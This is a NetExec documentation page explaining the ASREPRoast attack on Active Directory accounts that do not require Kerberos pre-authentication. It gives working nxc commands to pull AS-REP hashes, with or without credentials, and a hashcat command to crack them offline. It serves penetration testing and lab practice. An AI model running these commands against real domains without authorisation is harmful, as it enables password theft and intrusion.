search
NetExec GithubNetexec Lab
githubEdit

ASREPRoast

Retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required

circle-check

You can retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required if you have a list of users on the domain

hashtag
Without authentication

The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in Kerberos theoryarrow-up-right.

nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt

Using a wordlist, you can find wordlists of username here

nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
circle-info

Set the password value to '' to perform the test without authentication

hashtag
With authentication

If you have one valid credential on the domain, you can retrieve all the users and hashes where the Kerberos pre-authentication is not required

nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
circle-info

Use option kdcHost when the domain name resolution fail

nxc ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name

hashtag
Cracking with hashcat

To crack hashes on the file output.txt with hashcat use the following options:

hashcat -m18200 output.txt wordlist

hashtag
Example

Forest machine is a good example to test ASREPRoast with NetExec

LogoJoin The Best Hacking Community Worldwide | Hack The BoxHack The Boxchevron-right

hashtag
Ressources

LogoKerberos (II): How to attack Kerberos?Tarlogic Securitychevron-right
LogoAS-REP Roasting | Red Team Notesired.teamchevron-right
LogoAS_REP Roastinghackndochevron-right
PreviousQuery LDAPNextFind Domain SID

Last updated

Was this helpful?